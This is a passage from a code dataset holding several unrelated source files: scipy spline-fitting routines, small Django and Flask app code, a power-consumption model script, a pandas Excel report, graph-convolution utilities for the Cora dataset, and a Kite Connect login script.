atleast_1d(ty)\n ny = len(_surfit_cache['ty'])\n if task == -1 and nx < 2*kx+2:\n raise TypeError('There must be at least 2*kx+2 knots_x for task=-1')\n if task == -1 and ny < 2*ky+2:\n raise TypeError('There must be at least 2*ky+2 knots_x for task=-1')\n if not ((1 <= kx <= 5) and (1 <= ky <= 5)):\n raise TypeError('Given degree of the spline (kx,ky=%d,%d) is not '\n 'supported. 
(1<=k<=5)' % (kx, ky))\n if m < (kx + 1)*(ky + 1):\n raise TypeError('m >= (kx+1)(ky+1) must hold')\n if nxest is None:\n nxest = int(kx + sqrt(m/2))\n if nyest is None:\n nyest = int(ky + sqrt(m/2))\n nxest, nyest = max(nxest, 2*kx + 3), max(nyest, 2*ky + 3)\n if task >= 0 and s == 0:\n nxest = int(kx + sqrt(3*m))\n nyest = int(ky + sqrt(3*m))\n if task == -1:\n _surfit_cache['tx'] = atleast_1d(tx)\n _surfit_cache['ty'] = atleast_1d(ty)\n tx, ty = _surfit_cache['tx'], _surfit_cache['ty']\n wrk = _surfit_cache['wrk']\n u = nxest - kx - 1\n v = nyest - ky - 1\n km = max(kx, ky) + 1\n ne = max(nxest, nyest)\n bx, by = kx*v + ky + 1, ky*u + kx + 1\n b1, b2 = bx, bx + v - ky\n if bx > by:\n b1, b2 = by, by + u - kx\n msg = \"Too many data points to interpolate\"\n lwrk1 = _int_overflow(u*v*(2 + b1 + b2) +\n 2*(u + v + km*(m + ne) + ne - kx - ky) + b2 + 1,\n msg=msg)\n lwrk2 = _int_overflow(u*v*(b2 + 1) + b2, msg=msg)\n tx, ty, c, o = _fitpack._surfit(x, y, z, w, xb, xe, yb, ye, kx, ky,\n task, s, eps, tx, ty, nxest, nyest,\n wrk, lwrk1, lwrk2)\n _curfit_cache['tx'] = tx\n _curfit_cache['ty'] = ty\n _curfit_cache['wrk'] = o['wrk']\n ier, fp = o['ier'], o['fp']\n tck = [tx, ty, c, kx, ky]\n\n ierm = min(11, max(-3, ier))\n if ierm <= 0 and not quiet:\n _mess = (_iermess2[ierm][0] +\n \"\\tkx,ky=%d,%d nx,ny=%d,%d m=%d fp=%f s=%f\" %\n (kx, ky, len(tx), len(ty), m, fp, s))\n warnings.warn(RuntimeWarning(_mess))\n if ierm > 0 and not full_output:\n if ier in [1, 2, 3, 4, 5]:\n _mess = (\"\\n\\tkx,ky=%d,%d nx,ny=%d,%d m=%d fp=%f s=%f\" %\n (kx, ky, len(tx), len(ty), m, fp, s))\n warnings.warn(RuntimeWarning(_iermess2[ierm][0] + _mess))\n else:\n try:\n raise _iermess2[ierm][1](_iermess2[ierm][0])\n except KeyError as e:\n raise _iermess2['unknown'][1](_iermess2['unknown'][0]) from e\n if full_output:\n try:\n return tck, fp, ier, _iermess2[ierm][0]\n except KeyError:\n return tck, fp, ier, _iermess2['unknown'][0]\n else:\n return tck\n\n\ndef bisplev(x, y, tck, dx=0, dy=0):\n \"\"\"\n Evaluate a bivariate B-spline and its derivatives.\n\n Return a rank-2 array of spline function values (or spline derivative\n values) at points given by the cross-product of the rank-1 arrays `x` and\n `y`. In special cases, return an array or just a float if either `x` or\n `y` or both are floats. Based on BISPEV from FITPACK.\n\n Parameters\n ----------\n x, y : ndarray\n Rank-1 arrays specifying the domain over which to evaluate the\n spline or its derivative.\n tck : tuple\n A sequence of length 5 returned by `bisplrep` containing the knot\n locations, the coefficients, and the degree of the spline:\n [tx, ty, c, kx, ky].\n dx, dy : int, optional\n The orders of the partial derivatives in `x` and `y` respectively.\n\n Returns\n -------\n vals : ndarray\n The B-spline or its derivative evaluated over the set formed by\n the cross-product of `x` and `y`.\n\n See Also\n --------\n splprep, splrep, splint, sproot, splev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `bisplrep` to generate the `tck` representation.\n\n References\n ----------\n .. [1] Dierckx P. : An algorithm for surface fitting\n with spline functions\n Ima J. Numer. Anal. 1 (1981) 267-283.\n .. [2] Dierckx P. : An algorithm for surface fitting\n with spline functions\n report tw50, Dept. Computer Science,K.U.Leuven, 1980.\n .. [3] Dierckx P. 
: Curve and surface fitting with splines,\n Monographs on Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n Examples are given :ref:`in the tutorial `.\n\n \"\"\"\n tx, ty, c, kx, ky = tck\n if not (0 <= dx < kx):\n raise ValueError(\"0 <= dx = %d < kx = %d must hold\" % (dx, kx))\n if not (0 <= dy < ky):\n raise ValueError(\"0 <= dy = %d < ky = %d must hold\" % (dy, ky))\n x, y = map(atleast_1d, [x, y])\n if (len(x.shape) != 1) or (len(y.shape) != 1):\n raise ValueError(\"First two entries should be rank-1 arrays.\")\n z, ier = _fitpack._bispev(tx, ty, c, kx, ky, x, y, dx, dy)\n if ier == 10:\n raise ValueError(\"Invalid input data\")\n if ier:\n raise TypeError(\"An error occurred\")\n z.shape = len(x), len(y)\n if len(z) > 1:\n return z\n if len(z[0]) > 1:\n return z[0]\n return z[0][0]\n\n\ndef dblint(xa, xb, ya, yb, tck):\n \"\"\"Evaluate the integral of a spline over area [xa,xb] x [ya,yb].\n\n Parameters\n ----------\n xa, xb : float\n The end-points of the x integration interval.\n ya, yb : float\n The end-points of the y integration interval.\n tck : list [tx, ty, c, kx, ky]\n A sequence of length 5 returned by bisplrep containing the knot\n locations tx, ty, the coefficients c, and the degrees kx, ky\n of the spline.\n\n Returns\n -------\n integ : float\n The value of the resulting integral.\n \"\"\"\n tx, ty, c, kx, ky = tck\n return dfitpack.dblint(tx, ty, c, kx, ky, xa, xb, ya, yb)\n\n\ndef insert(x, tck, m=1, per=0):\n \"\"\"\n Insert knots into a B-spline.\n\n Given the knots and coefficients of a B-spline representation, create a\n new B-spline with a knot inserted `m` times at point `x`.\n This is a wrapper around the FORTRAN routine insert of FITPACK.\n\n Parameters\n ----------\n x (u) : array_like\n A 1-D point at which to insert a new knot(s). If `tck` was returned\n from ``splprep``, then the parameter values, u should be given.\n tck : tuple\n A tuple (t,c,k) returned by ``splrep`` or ``splprep`` containing\n the vector of knots, the B-spline coefficients,\n and the degree of the spline.\n m : int, optional\n The number of times to insert the given knot (its multiplicity).\n Default is 1.\n per : int, optional\n If non-zero, the input spline is considered periodic.\n\n Returns\n -------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the new spline.\n ``t(k+1) <= x <= t(n-k)``, where k is the degree of the spline.\n In case of a periodic spline (``per != 0``) there must be\n either at least k interior knots t(j) satisfying ``t(k+1)>> from scipy.interpolate import splrep, splder, sproot\n >>> x = np.linspace(0, 10, 70)\n >>> y = np.sin(x)\n >>> spl = splrep(x, y, k=4)\n\n Now, differentiate the spline and find the zeros of the\n derivative. (NB: `sproot` only works for order 3 splines, so we\n fit an order 4 spline):\n\n >>> dspl = splder(spl)\n >>> sproot(dspl) / np.pi\n array([ 0.50000001, 1.5 , 2.49999998])\n\n This agrees well with roots :math:`\\\\pi/2 + n\\\\pi` of\n :math:`\\\\cos(x) = \\\\sin'(x)`.\n\n \"\"\"\n if n < 0:\n return splantider(tck, -n)\n\n t, c, k = tck\n\n if n > k:\n raise ValueError((\"Order of derivative (n = %r) must be <= \"\n \"order of spline (k = %r)\") % (n, tck[2]))\n\n # Extra axes for the trailing dims of the `c` array:\n sh = (slice(None),) + ((None,)*len(c.shape[1:]))\n\n with np.errstate(invalid='raise', divide='raise'):\n try:\n for j in range(n):\n # See e.g. 
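# --- Editorial sketch (not a dataset record): knot insertion via scipy's
# public `insert`, which wraps the FITPACK routine documented above. Knot
# insertion changes the representation but not the spline's values.
import numpy as np
from scipy.interpolate import splrep, insert, splev

x = np.linspace(0, 10, 30)
tck = splrep(x, x ** 2)
tck2 = insert(5.0, tck, m=2)   # insert an interior knot at x=5, multiplicity 2
assert np.allclose(splev(3.3, tck), splev(3.3, tck2))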
Schumaker, Spline Functions: Basic Theory, Chapter 5\n\n # Compute the denominator in the differentiation formula.\n # (and append traling dims, if necessary)\n dt = t[k+1:-1] - t[1:-k-1]\n dt = dt[sh]\n # Compute the new coefficients\n c = (c[1:-1-k] - c[:-2-k]) * k / dt\n # Pad coefficient array to same size as knots (FITPACK\n # convention)\n c = np.r_[c, np.zeros((k,) + c.shape[1:])]\n # Adjust knots\n t = t[1:-1]\n k -= 1\n except FloatingPointError as e:\n raise ValueError((\"The spline has internal repeated knots \"\n \"and is not differentiable %d times\") % n) from e\n\n return t, c, k\n\n\ndef splantider(tck, n=1):\n \"\"\"\n Compute the spline for the antiderivative (integral) of a given spline.\n\n Parameters\n ----------\n tck : tuple of (t, c, k)\n Spline whose antiderivative to compute\n n : int, optional\n Order of antiderivative to evaluate. Default: 1\n\n Returns\n -------\n tck_ader : tuple of (t2, c2, k2)\n Spline of order k2=k+n representing the antiderivative of the input\n spline.\n\n See Also\n --------\n splder, splev, spalde\n\n Notes\n -----\n The `splder` function is the inverse operation of this function.\n Namely, ``splder(splantider(tck))`` is identical to `tck`, modulo\n rounding error.\n\n .. versionadded:: 0.13.0\n\n Examples\n --------\n >>> from scipy.interpolate import splrep, splder, splantider, splev\n >>> x = np.linspace(0, np.pi/2, 70)\n >>> y = 1 / np.sqrt(1 - 0.8*np.sin(x)**2)\n >>> spl = splrep(x, y)\n\n The derivative is the inverse operation of the antiderivative,\n although some floating point error accumulates:\n\n >>> splev(1.7, spl), splev(1.7, splder(splantider(spl)))\n (array(2.1565429877197317), array(2.1565429877201865))\n\n Antiderivative can be used to evaluate definite integrals:\n\n >>> ispl = splantider(spl)\n >>> splev(np.pi/2, ispl) - splev(0, ispl)\n 2.2572053588768486\n\n This is indeed an approximation to the complete elliptic integral\n :math:`K(m) = \\\\int_0^{\\\\pi/2} [1 - m\\\\sin^2 x]^{-1/2} dx`:\n\n >>> from scipy.special import ellipk\n >>> ellipk(0.8)\n 2.2572053268208538\n\n \"\"\"\n if n < 0:\n return splder(tck, -n)\n\n t, c, k = tck\n\n # Extra axes for the trailing dims of the `c` array:\n sh = (slice(None),) + (None,)*len(c.shape[1:])\n\n for j in range(n):\n # This is the inverse set of operations to splder.\n\n # Compute the multiplier in the antiderivative formula.\n dt = t[k+1:] - t[:-k-1]\n dt = dt[sh]\n # Compute the new coefficients\n c = np.cumsum(c[:-k-1] * dt, axis=0) / (k + 1)\n c = np.r_[np.zeros((1,) + c.shape[1:]),\n c,\n [c[-1]] * (k+2)]\n # New knots\n t = np.r_[t[0], t, t[-1]]\n k += 1\n\n return t, c, k\n","sub_path":"contrib/python/scipy/py3/scipy/interpolate/_fitpack_impl.py","file_name":"_fitpack_impl.py","file_ext":"py","file_size_in_byte":46842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406917854","text":"import json, xmltodict\n\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n help =\"\"\"\n Accepts GPX file and converts to JSON object\n\n Needs more robust error handling and validation.\n \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('gpx_file', type=str)\n\n def handle(self, *args, **options):\n try:\n if options['gpx_file']:\n gpx_file = options['gpx_file']\n\n with open(gpx_file, 'r') as gpx:\n ride_dict = xmltodict.parse(gpx.read(), xml_attribs=True)\n return json.dumps(ride_dict, indent=4)\n except:\n 
raise\n","sub_path":"trail_tracker/trails/management/commands/parse_gpx.py","file_name":"parse_gpx.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271496455","text":"from django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^linky/', include('linky.foo.urls')),\n\n # Create a url\n url(r'^/?$', 'shorten.views.create', { 'template': 'shorten/create.html' }, name='shorten-create'),\n \n # Listing\n url(r'^/-/list/$', 'shorten.views.listing', { 'template': 'shorten/listing.html' }, name='shorten-listing'),\n \n # Lookup and redirect\n url(r'^(?P[-\\w]+)/$', 'shorten.views.lookup', name='shorten-lookup'),\n \n # Lookup and redirect\n url(r'^(?P[-\\w]+)/info/$', 'shorten.views.info', { 'template': 'shorten/info.html' }, name='shorten-info'),\n \n # Admin\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"64981583","text":"if REQUEST is not None:\n raise Unauthorized(\"Unauthorized call script from URL\")\n\nmodel_id = context.getWattConsumptionModel(\"no_model\")\n\n######\n# Introduce your Consumption Model here\n######\ndef consumption_model_shuttle_ds61_i7(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 21.5 + 1.06*load\n else:\n return 48 + 0.29*load\n\ndef consumption_model_shuttle_nuc_i7(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 8.5 + 0.46*load\n else:\n return 20 + 0.08*load\n\ndef consumption_model_rikomagic_mk802iv(load):\n \"\"\" Expected consumed watts for the computer load\n \"\"\"\n if load <= 25:\n return 2.2 + 0.04*load\n else:\n return 3.2 + 0.008*load\n\ndef no_model(load):\n return 0\n\nmodel_map = {\n \"shuttle_ds61_i7\" : consumption_model_shuttle_ds61_i7,\n \"rikomagic_mk802iv\": consumption_model_rikomagic_mk802iv,\n \"intel_nuc_i7\": consumption_model_shuttle_nuc_i7\n}\nif cpu_load_percentage is None:\n cpu_load_percentage = context.Computer_getLatestCPUPercentLoad()\n\ncpu_load_percentage += partition_increment\n\nreturn model_map.get(model_id, no_model)(cpu_load_percentage)\n","sub_path":"master/bt5/slapos_accounting/SkinTemplateItem/portal_skins/slapos_consumption/Computer_getWattConsumption.py","file_name":"Computer_getWattConsumption.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"218572472","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Author : rocky\r\n# Date : 2018-08-15 12:27:53 \r\n# Last Modified by : rocky\r\n# Last Modified time : 2018-08-15 12:27:53\r\n# Version :\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\ndef loadFile(path):\r\n \r\n df = pd.read_excel(path)\r\n\r\n df.rename(columns={'上线延期率(≤8%)': '计划上线天数', 'Unnamed: 17': '最终上线天数', 'Unnamed: 18': '上线延期率', '需求响应时效(≤12)': '需求响应时效', '开发效率(≥60%)': '开发时长', 'Unnamed: 21': '整个sit时间', 'Unnamed: 22': '开发效率', '测试效率(≤25.6%)': '测试时长', 'Unnamed: 24': '测试效率'}, inplace = True)\r\n\r\n\r\n df = df.drop([0])[['产品线', '系统名称', '需求响应时效', '开发时长', '测试时长', '总时长']]\r\n df[['需求响应时效', '开发时长', '测试时长', '总时长']] = df[['需求响应时效', '开发时长', '测试时长', '总时长']].astype(float)\r\n df['系统名称'] = df['系统名称'].apply(lambda x: 
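# --- Editorial sketch (not a dataset record): the dict-dispatch-with-default
# pattern used by Computer_getWattConsumption above; the piecewise constants
# mirror the shuttle_ds61_i7 model in the record.
def _ds61_watts(load):
    return 21.5 + 1.06 * load if load <= 25 else 48 + 0.29 * load

_model_map = {'shuttle_ds61_i7': _ds61_watts}
_no_model = lambda load: 0
assert _model_map.get('unknown_id', _no_model)(80.0) == 0       # safe fallback
assert _model_map.get('shuttle_ds61_i7', _no_model)(50.0) == 62.5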
str(x).strip())\r\n\r\n \r\n\r\n\r\n \r\n return df\r\n\r\ndef dataProcessing(df):\r\n grouped = df.groupby('系统名称')\r\n _a = grouped['需求响应时效'].mean()\r\n _b = grouped[['开发时长', '测试时长', '总时长']].sum()\r\n _c = grouped.size()\r\n\r\n \r\n r = pd.concat([_a, _b], axis=1)\r\n \r\n\r\n r.eval('开发效率 = 开发时长/总时长', inplace=True)\r\n r.eval('测试效率 = 测试时长/总时长', inplace=True)\r\n r['测试效率'] = r['测试效率'].apply(lambda x: format(x, '.2%')) \r\n r['开发效率'] = r['开发效率'].apply(lambda x: format(x, '.2%')) \r\n r = pd.concat([r, _c], axis=1)\r\n \r\n r.rename(columns={0: '功能更新效率'}, inplace = True)\r\n r['需求响应时效'] = r['需求响应时效'].apply(lambda x: format(x, '.2f')) \r\n r['开发时长'] = r['开发时长'].apply(lambda x: format(x, '.2f')) \r\n r['测试时长'] = r['测试时长'].apply(lambda x: format(x, '.2f')) \r\n r['总时长'] = r['总时长'].apply(lambda x: format(x, '.2f')) \r\n\r\n return r\r\n\r\ndef writeFile(df, dstPath):\r\n df.to_excel(r'xxx.xlsx')\r\n\r\ndef main():\r\n srcPath = r'../data/新过程质量数据监控模板.xlsx'\r\n dstPath = r'../data/tmp.xlsx'\r\n\r\n if len(sys.argv) != 3:\r\n print('Usage: python pyFileName ')\r\n else:\r\n\r\n srcPath = sys.argv[1]\r\n dstPath = sys.argv[2]\r\n print(dstPath)\r\n if os.path.exists(srcPath) and os.path.exists(dstPath):\r\n df = loadFile(srcPath)\r\n r = dataProcessing(df)\r\n writeFile(r, dstPath)\r\n else:\r\n print('the srcFile or dstDir is not exists')\r\n\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"pandas-learn/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"88216018","text":"from __future__ import print_function\n\nimport scipy.sparse as sp\nimport numpy as np\nfrom scipy.sparse.linalg.eigen.arpack import eigsh, ArpackNoConvergence\n\n\n\"\"\"\ncoo_matrix: 这种悉数矩阵不能进行矩阵运算\ncsr_matrix: 可以进行矩阵运算\n csr_matrix((data, indices, indptr), [shape=(M, N)])\n is the standard CSR representation where the column indices for\n row i are stored in ``indices[indptr[i]:indptr[i+1]]`` and their\n corresponding values are stored in ``data[indptr[i]:indptr[i+1]]``.\n If the shape parameter is not supplied, the matrix dimensions\n are inferred from the index arrays.\n 它的典型的构造方式,data: 非零元素的值\n indices: data对应数据的column值\n indptr: 除了第一元素是0,其他的每个元素都是从上到下(row���向)非零元素\n 积累的个数\n\"\"\"\n\ndef encode_onehot(labels):\n # .content 文件的label 是一串英文字符,用 set 唯一化\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n return labels_onehot\n\n\ndef load_data(path=\"data/cora/\", dataset=\"cora\"):\n \"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n # 特征从第一列一直到最后一列\n # 提取样本的特征,用csr矩阵(压缩系数矩阵),用行索引、列索引、值来代表原有的密度矩阵\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n # .content 文件每行的最后一个列就是label,是 英文字符串\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n # 样本的 id ,在第一列, id是乱序的整数\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n # 样本的 id 到 index 索引 的字典映射\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n # 使得 node 的 id 的索引是从 0 开始,逐渐增加\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n # 
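# --- Editorial sketch (not a dataset record): the id -> contiguous-index
# remapping used by load_data above, on a tiny hand-made citation list.
import numpy as np

idx = np.array([35, 40, 12], dtype=np.int32)   # raw node ids, arbitrary order
idx_map = {j: i for i, j in enumerate(idx)}    # id -> 0-based row index
edges_unordered = np.array([[35, 12], [40, 35]], dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),
                 dtype=np.int32).reshape(edges_unordered.shape)
# edges == [[0, 2], [1, 0]]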
构建图的邻接矩阵,用坐标形式的稀疏矩阵表示,非对称邻接矩阵\n # sp.coo_matrix((data, (row, col)), shape, dtype)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n # 将非对称的邻接矩阵转换成对称的邻接矩阵\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n # 打印消息:数据集有多少个节点、多少条边、每个样本有多少维特征\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels\n\n\n# 对邻接矩阵进行归一化处理\ndef normalize_adj(adj, symmetric=True):\n # 如果是对称的,得到对称归一化邻接矩阵\n # D^(-1/2) * A * D^(-1/2)\n if symmetric:\n # A.sum(1), 求出每个节点的度,计算每行元素之和,得到节点的度矩阵 D\n # np.power(A, -0.5) 在经过 flatten 得到一维度的D^-1/2\n # sp.diags(A, offset=0) offest 就是这个中心对称轴的数据的偏移量,A是一维向量\n d = sp.diags(np.power(np.array(adj.sum(1)), -0.5).flatten(), offsets=0)\n # tocsr() 将矩阵转换为压缩稀疏矩阵\n a_norm = adj.dot(d).transpose().dot(d).tocsr() # ?为什么跟公式不一样\n else:\n # 如果邻接矩阵不是对称矩阵,得到随机游走正则化拉普拉斯算子\n # D^(-1) * A\n d = sp.diags(np.power(np.array(adj.sum(1)), -1).flatten(), 0)\n a_norm = d.dot(adj).tocsr()\n return a_norm\n\n\ndef preprocess_adj(adj, symmetric=True):\n # 在邻接矩阵中加入自连接\n adj = adj + sp.eye(adj.shape[0])\n # 对加入之连接的矩阵进行归一化处理\n adj = normalize_adj(adj, symmetric)\n return adj\n\n\ndef sample_mask(idx, l):\n \"\"\"\n # 构造样本掩码,mask掉return 索引上为False的样本\n :param idx: 有标签的样本索引\n :param l: 所有样本的长度\n :return: 布尔类型的数组,其中有标签的位置为True,无标签的位置为False\n \"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\n\ndef get_splits(y):\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n y_train = np.zeros(y.shape, dtype=np.int32)\n y_val = np.zeros(y.shape, dtype=np.int32)\n y_test = np.zeros(y.shape, dtype=np.int32)\n y_train[idx_train] = y[idx_train]\n y_val[idx_val] = y[idx_val]\n y_test[idx_test] = y[idx_test]\n train_mask = sample_mask(idx_train, y.shape[0])\n return y_train, y_val, y_test, idx_train, idx_val, idx_test, train_mask\n\n\ndef categorical_crossentropy(preds, labels):\n \"\"\"\n 定义分类交叉熵\n :param preds: 模型输出的数组\n :param labels: one-hot 编码的label标签\n :return: 样本的平均交叉熵损失\n \"\"\"\n # np.extract(condition, arr)\n # np.mean() 默认求数组中所有数的均值\n # 这里的 labels 就是这里的 condition\n # 如果condition是一个bool数组,那么这个相当于 arr[condition]\n return np.mean(-np.log(np.extract(labels, preds)))\n\n\ndef accuracy(preds, labels):\n # 定义准确率函数\n # np.argmax(arr, axis), 输出指定 axis轴上的最大值的索引\n # np.equal(x1, x2) 逐元素对比是否相等,相等返回True,否则返回False,是 np.bool 型的变量\n return np.mean(np.equal(np.argmax(labels, 1), np.argmax(preds, 1)))\n\n\ndef evaluate_preds(preds, labels, indices):\n \"\"\"\n 评估样本划分的损失函数和准确率\n :param preds:对于样本的预测值\n :param labels:样本的标签one-hot向量\n :param indices:样本的索引集合\n :return:交叉熵损失函数列表、准确率列表\n \"\"\"\n split_loss = list()\n split_acc = list()\n\n for y_split, idx_split in zip(labels, indices):\n # 计算每一个样本的交叉熵损失函数\n split_loss.append(categorical_crossentropy(preds[idx_split], y_split[idx_split]))\n # 计算每一个样本的准确率\n split_acc.append(accuracy(preds[idx_split], y_split[idx_split]))\n\n return split_loss, split_acc\n\n\ndef normalized_laplacian(adj, symmetric=True):\n # 对拉普拉斯矩阵进行归一化处理\n # 对称归一化的邻接矩阵,D ^ (-1/2) * A * D ^ (-1/2)\n adj_normalized = normalize_adj(adj, symmetric)\n # 得到对称规范化的图拉普拉斯矩阵,L = I - D ^ (-1/2) * A * D ^ (-1/2)\n laplacian = sp.eye(adj.shape[0]) - adj_normalized\n return laplacian\n\n\ndef rescale_laplacian(laplacian):\n # 得到对称规范化的图拉普拉斯矩阵,L = I - D ^ (-1/2) * A * D ^ (-1/2)\n try:\n print('Calculating largest eigenvalue of 
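# --- Editorial sketch (not a dataset record): the symmetric normalization
# D^-1/2 (A+I) D^-1/2 from normalize_adj/preprocess_adj above, on a toy
# 2-node graph.
import numpy as np
import scipy.sparse as sp

adj = sp.coo_matrix(np.array([[0., 1.], [1., 0.]])) + sp.eye(2)  # add self-loops
d = sp.diags(np.power(np.array(adj.sum(1)), -0.5).flatten(), offsets=0)
a_norm = adj.dot(d).transpose().dot(d).tocsr()
# here a_norm == [[0.5, 0.5], [0.5, 0.5]]: rows sum to 1 because the toy
# graph is regular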
normalized graph Laplacian...')\n # 计算归一化后的图拉普拉斯矩阵的最大特征值\n # Find k eigenvalues and eigenvectors of the real symmetric square matrix or complex hermitian matrix A.\n largest_eigval = eigsh(laplacian, 1, which='LM', return_eigenvectors=False)[0]\n except ArpackNoConvergence:\n # 如果计算过程不收敛,最大特征值用 2 代替\n print('Eigenvalue calculation did not converge! Using largest_eigval=2 instead.')\n largest_eigval = 2\n\n # 调整后的对称归一化图拉普拉斯矩阵,L~ = 2 / Lambda * L - I\n scaled_laplacian = (2. / largest_eigval) * laplacian - sp.eye(laplacian.shape[0])\n return scaled_laplacian\n\n\ndef chebyshev_polynomial(X, k):\n # 返回一个稀疏矩阵列表\n \"\"\"Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices.\"\"\"\n # 计算直到k阶的切比雪夫多项式\n print(\"Calculating Chebyshev polynomials up to order {}...\".format(k))\n\n T_k = list()\n T_k.append(sp.eye(X.shape[0]).tocsr()) # T0(X) = I\n T_k.append(X) # T1(X) = L~\n\n # 定义切比雪夫递归公式\n def chebyshev_recurrence(T_k_minus_one, T_k_minus_two, X):\n \"\"\"\n :param T_k_minus_one: T(k-1)(L~)\n :param T_k_minus_two: T(k-2)(L~)\n :param X: L~\n :return: Tk(L~)\n \"\"\"\n # 将输入转化为csr矩阵(压缩稀疏行矩阵)\n X_ = sp.csr_matrix(X, copy=True)\n # 递归公式:Tk(L~) = 2L~ * T(k-1)(L~) - T(k-2)(L~)\n return 2 * X_.dot(T_k_minus_one) - T_k_minus_two\n\n for i in range(2, k+1):\n T_k.append(chebyshev_recurrence(T_k[-1], T_k[-2], X))\n\n # 返回切比雪夫多项式列表\n return T_k\n\n\ndef sparse_to_tuple(sparse_mx):\n # 将稀疏矩阵转化为元组表示\n if not sp.isspmatrix_coo(sparse_mx):\n # 将稀疏矩阵转化为coo矩阵形式\n # coo矩阵采用三个数组分别存储行、列和非零元素值的信息\n sparse_mx = sparse_mx.tocoo()\n # np.vstack()函数沿着数组的某条轴堆叠数组\n # 获取非零元素的位置索引\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n # 获得矩阵非零元素的值\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n","sub_path":"kegra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410753261","text":"import logging\nimport kiteSettings\nfrom kiteconnect import KiteConnect\n\nlogging.basicConfig(level=logging.DEBUG)\n\nkite = KiteConnect(kiteSettings.api_key)\n\n# https://kite.zerodha.com/connect/login?v=4&api_key=Q8JPzjkt8ftXgqvmXa\n\nrequest_token = input(\"Request Token: \")\ndata = kite.generate_session(request_token, kiteSettings.api_secret)\nkite.set_access_token(data[\"access_token\"])\n\nprint(\"====================\")\nprint(\"Access Token: \",data[\"access_token\"])\n","sub_path":"KITEE/kiteGetAccessToken.py","file_name":"kiteGetAccessToken.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"164769981","text":"from flask import render_template, redirect, url_for, request, flash\nfrom flask_login import login_required, current_user\nfrom application.lists.forms import ListForm, AddItemForm, UpdateListItem\nfrom application.main.models import User, List, Item\nfrom application.lists import bp_lists\nfrom application import db\n\n# list related routes\n\n@bp_lists.route('/create_list', methods=['GET', 'POST'])\n@login_required\ndef create_list():\n form = ListForm()\n if form.validate_on_submit():\n new_list = List(name=form.name.data, owner=current_user)\n db.session.add(new_list)\n db.session.commit()\n flash('Your list is now live!')\n return redirect(url_for('main.index'))\n return render_template('lists/create.html', form=form)\n\n@bp_lists.route('/prep_list/', methods=['GET','POST'])\n@login_required\ndef prep_list(list_id):\n p_list = 
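# --- Editorial sketch (not a dataset record): the Chebyshev recurrence
# T_k = 2*X.dot(T_{k-1}) - T_{k-2} from chebyshev_polynomial, on a toy
# scaled Laplacian.
import numpy as np
import scipy.sparse as sp

X = sp.eye(3).tocsr() - sp.csr_matrix(np.full((3, 3), 1.0 / 3.0))
T_k = [sp.eye(3).tocsr(), X]
for _ in range(2, 4):
    T_k.append(2 * X.dot(T_k[-1]) - T_k[-2])
# T_k now holds T_0(X) .. T_3(X) as sparse matrices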
